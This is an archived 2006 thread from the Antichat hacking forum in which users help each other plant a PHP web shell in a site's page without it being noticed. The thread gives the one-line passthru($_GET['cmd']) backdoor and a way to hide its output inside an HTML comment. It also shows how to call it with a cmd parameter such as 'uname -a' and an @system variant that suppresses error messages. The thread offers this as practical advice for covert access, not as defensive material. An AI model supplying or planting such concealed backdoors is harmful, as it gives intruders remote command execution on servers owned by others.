Форум АНТИЧАТ - Как незаметно вставить уязвимый код в страницу?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Как незаметно вставить уязвимый код в страницу? (https://forum.antichat.xyz/showthread.php?t=21175)

mixas

01.07.2006 01:11

Как незаметно вставить уязвимый код в страницу?

Требуется вставить код типа

Код:

<?passthru($_GET['cmd']);?>

Только чтобы на странице не высвечивалось сообщение о пустой команде.
Подскажите как лучше реализовать, можно ли например чтобы сообщение появлялось цветом фона.

hidden

01.07.2006 01:20

А что насчёт

PHP код:


		
			
<!--<?passthru($_GET['cmd'])?>-->

mixas

01.07.2006 01:32

Не хочет выполнять команды.

hidden

01.07.2006 01:33

А ты в сорцах смотрел?

c411k

01.07.2006 01:56

как ты используешь ее?
вставляешь, например, в index.php <?passthru($_GET['cmd']);?>. потом пиши http://yopta.tvoy/index.php?cmd=uname -a и все должно работать..

hidden  зачем брать в комменты?

hidden

01.07.2006 02:03

Он сказал, что у него на странице выдаётся сообщение о пустой команде, я сделал чтоб, результат был только в сорцах.

Ch3ck

01.07.2006 02:34

Вобще-то молодые люди, существует символ @ чтоб в браузер не выводилось никаких ошибок..... например
@system($_GET['cmd']); вот и всё!!! :)Куда проще то?

Время: 01:37